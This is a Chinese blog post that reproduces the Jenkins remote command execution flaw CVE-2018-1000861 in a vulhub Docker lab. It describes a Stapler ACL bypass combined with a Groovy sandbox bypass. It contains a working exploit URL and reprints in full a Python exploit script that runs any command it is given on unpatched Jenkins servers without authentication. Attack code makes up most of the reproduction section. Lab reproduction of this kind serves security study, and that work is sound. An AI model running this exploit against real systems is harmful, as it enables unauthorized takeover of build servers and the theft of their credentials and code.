Jenkins远程命令执行漏洞(CVE-2018-1000861)

最新推荐文章于 2024-03-31 08:33:51 发布
最新推荐文章于 2024-03-31 08:33:51 发布
阅读量2.7k 收藏 4
点赞数
分类专栏: 中间件漏洞复现 文章标签: jenkins 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110722789
版权

声明

好好学习,天天向上

漏洞描述

Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。

通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

影响范围

2.153 and earlier,

LTS 2.138.3 and earlier

复现过程

这里使用2.138版本

使用vulhub

cd /app/vulhub-master/jenkins/CVE-2018-1000861

使用docker启动

docker-compose up -d

环境启动后,访问http://your-ip:8080即可看到一个已经成功初始化的Jenkins,无需再进行任何操作。

http://192.168.239.129:8080

开始攻击,直接访问下面的URL即可执行命令

http://192.168.239.129:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
  public x(){
    "touch /tmp/cve-2018-1000861-UrlAttack".execute()
  }
}

或者用git大佬的exp.py

#!/usr/bin/python
# coding: UTF-8
# author: Orange Tsai(@orange_8361)
# 

import sys
import requests
from enum import Enum

# remove bad SSL warnings
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass


endpoint = 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'

class mode(Enum):
    ACL_PATCHED = 0
    NOT_JENKINS = 1
    READ_ENABLE = 2
    READ_BYPASS = 3
    ENTRY_NOTFOUND = 999

def usage():
    print '''
  Usage:
    python exp.py <url> <cmd>
    '''

def _log(msg, fail=False):
    nb = '[*]'
    if fail:
        nb = '[-]'
    print '%s %s' % (nb, msg)

def _get(url, params=None):
    r = requests.get(url, verify=False, params=params)
    return r.status_code, r.content

def _add_bypass(url):
    return url + 'securityRealm/user/admin/'

def check(url):
    flag, accessible = mode.ACL_PATCHED, False

    # check ANONYMOUS_READ
    status, content = _get(url)
    if status == 200 and 'adjuncts' in content:
        flag, accessible = mode.READ_ENABLE, True
        _log('ANONYMOUS_READ enable!')
    elif status == 403:
        _log('ANONYMOUS_READ disable!')

        # check ACL bypass, CVE-2018-1000861
        status, content = _get(_add_bypass(url))
        if status == 200 and 'adjuncts' in content:
            flag, accessible = mode.READ_BYPASS, True
    else:
        flag = mode.NOT_JENKINS

    # check entry point, CVE-2019-1003005
    if accessible:
        if flag is mode.READ_BYPASS:
            url = _add_bypass(url)
        status, content = _get(url + endpoint)

        if status == 404:
            flag = mode.ENTRY_NOTFOUND

    return flag

def exploit(url, cmd):
    payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % cmd.encode('hex')
    params = {
        'sandbox': True, 
        'value': payload
    }

    status, content = _get(url + endpoint, params)
    if status == 200:
        _log('Exploit success!(it should be :P)')
    elif status == 405:
        _log('It seems Jenkins has patched the RCE gadget :(')
    else:
        _log('Exploit fail with HTTP status [%d]' % status, fail=True)
        if 'stack trace' in content:
            for _ in content.splitlines():
                if _.startswith('Caused:'):
                    _log(_, fail=True)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
        exit()

    url = sys.argv[1].rstrip('/') + '/'
    cmd = sys.argv[2]

    flag = check(url)
    if flag is mode.ACL_PATCHED:
        _log('It seems Jenkins is up-to-date(>2.137) :(', fail=True)
    elif flag is mode.NOT_JENKINS:
        _log('Is this Jenkins?', fail=True)
    elif flag is mode.READ_ENABLE:
        exploit(url, cmd)
    elif flag is mode.READ_BYPASS:
        _log('Bypass with CVE-2018-1000861!')
        exploit(_add_bypass(url), cmd)
    else:
        _log('The `checkScript` is not found, please try other entries(see refs)', fail=True)

直接运行

python exp.py http://192.168.239.129:8080/ 'touch /tmp/cve-2018-1000861-GitNBExp'

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Jenkins远程命令执行漏洞(CVE-2018-1000861)
玄道的网安博客
06-06 5566
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 554
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是
漏洞复现】Jenkins远程命令执行漏洞CVE-2018-1000861
weixin_43486390的博客
12-21 2339
0x01 漏洞介绍 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 0x02 影响版本
Jenkins学习(执行命令路径,脚本上传静态html代码)(一)
Nightwish5的博客
08-05 819
Jenkins的安装 可参考https://www.cnblogs.com/yangzp/p/12953810.html sudo wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat-stable/jenkins.repo sudo rpm --import https://pkg.jenkins.io/redhat-stable/jenkins.io.key yum install jenkins -y 一、jenkin
jenkins 执行远程linux命令
08-15
jenkins 执行远程linux命令jenkins 执行远程linux命令jenkins 执行远程linux命令
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码,即所谓的预认证远程代码执行(PreAuth RCE)。这个漏洞的影响非常严重,因为它无需任何登录凭据即可利用。 漏洞复现...
GitHack-master.rar
01-06
5. **Git漏洞利用与防护**:可能包含了关于已知Git漏洞的信息,例如CVE-2021-21300,这是一个允许攻击者通过恶意的Git钩子脚本执行任意代码的漏洞。了解这些漏洞可以帮助我们增强仓库的安全性。 6. **Git forensics...
pwn_jenkins:有关攻击Jenkins服务器的注意事项
05-12
身份验证/ ACL绕过(CVE-2018-1000861Jenkins <2.150.1) 详细信息。 如果Jenkins请求身份验证,但使用以下请求返回有效数据,则该漏洞很容易受到攻击: curl -k -4 -s ...
信息安全_数据安全_Hacking Jenkins !.pdf
08-22
- 已知漏洞Jenkins历史上曾发生过多次序列化漏洞,例如CVE-2015-8103、CVE-2016-0788等,这些漏洞可能导致远程代码执行(RCE)。 5. Jenkins历史上的序列化漏洞 - CVE-2015-8103:这是Jenkins中的第一个序列化...
2022年HW前沿漏洞利用库.pdf
06-30
其中,Windows系统漏洞包括CVE-2022-26809、CVE-2022-29141、CVE-2022-23257、CVE-2022-24537、CVE-2022-22008和CVE-2022-21907等多个漏洞。这些漏洞可能会导致远程代码执行、提权和虚拟化逃逸等问题。 服务漏洞...
Jenkins执行策略(图文讲解)
最新发布
python全栈
03-31 3957
1、定时任务表达式:Jenkins使用一种特定的表达式来定义定时任务的执行时间和频率。这个表达式被称为Cron表达式,它由5个或6个字段组成,分别表示分钟、小时、日期、月份和星期几。通过设置这些字段的值,可以实现各种不同的定时任务调度。【构建触发器】中勾选其他工程构建后触发,并输入关注的项目。名字随意命名,英文即可,例如testwebhook。【构建触发器】中勾选定时构建,并输入时间格式。星期几(0-7,其中0和7都表示星期日)一般情况下:勾选只有构建稳定时触发。
Jenkins: 执行 PowerShell 命令
weixin_40646872的博客
10-26 744
到目前为止,Jenkins 已经实现了对 PowerShell 的主流支持。期待 Jenkins 逐步的完善还存在的一些小问题,毕竟 MS 已经开始用 PowerShell 取代 bat 了。sparkdevsparkdev - 博客园。
Jenkins执行shell命令(本地和远程执行)
热门推荐
fen_fen的专栏
12-22 2万+
jenkins执行shell命令 执行本地命令或shell脚本 执行本地的一个脚本 3.执行远程机器命令或shell脚本 3.1.ssh 插件要安装好配置ssh权限 3.2.点击“系统管理”-->“系统配置”, 添加权限(这里使用的是用户密码)后,点击check connection,Successfull connection代表连接成功。 4.执行远程机器10.1.1.74的shell脚本 test.sh #!/bin/bash cd /home/cg pwd e
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4478
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
Jenkins远程连接Windows执行命令
古代宇航员的博客
06-21 4609
我在一台linux服务器上安装了Jenkins服务作为Jenkins服务器,除此之外,还有一台Windows电脑,安装了python环境,本地保存着自动化测试用的python代码,这台电脑用于执行基于chrome浏览器的自动化web测试。2台机器都处在同一个网络里。现在想要达到的效果是,利用Jenkins的定时构建任务,让Windows电脑能够定时地执行自动化测试,并返回结果,不需要人为的手动点击运行。
Jenkins :添加node权限获取凭据、执行命令
zhhhrj的博客
09-13 394
拥有Jenkins agent权限的账号可以对node节点进行操作,通过添加不同的node可以让流水线项目在不同的节点上运行,安装Jenkins的主机默认作为master节点。
Jenkins远程代码执行漏洞
weixin_30861459的博客
06-23 119
于一个月前,进行服务器巡检时,发现服务器存在不明进程,并且以Jenkins用户身份来运行.当时进行了处理并修复了漏洞.在此补上修复过程 第一反应是Jenkins存在漏洞,于是Google Jenkins漏洞,瞬间出现一大批文章. 影响的范围: 影响低于 2.56 的所有 Jenkins 主线版本 影响低于 2.46.1 的所有 Jenkins LTS 版本 摘自https...
linux jenkins相关命令
qq_41497074的博客
01-26 1023
(2)执行命令执行命令:“java -jar jenkins.war --ajp13Port=-1 --httpPort=8081”(3)启动jenkins服务:“net start jenkins”(4)停止jenkins服务:“net stop jenkins”(1)cd到jenkins的war包所在的目录。3.查询jenkins状态命令。1.jenkins启动命令。2.jenkins停止命令。4.重启jenkins命令
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2022-2048是Jenkins中的一个安全漏洞,存在于Jenkins的SSH插件中。攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用该漏洞Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞的利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循最佳的安全实践。此外,也可以采取其他措施,如限制Jenkins服务器的网络访问权限,使用防火墙保护服务器等等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值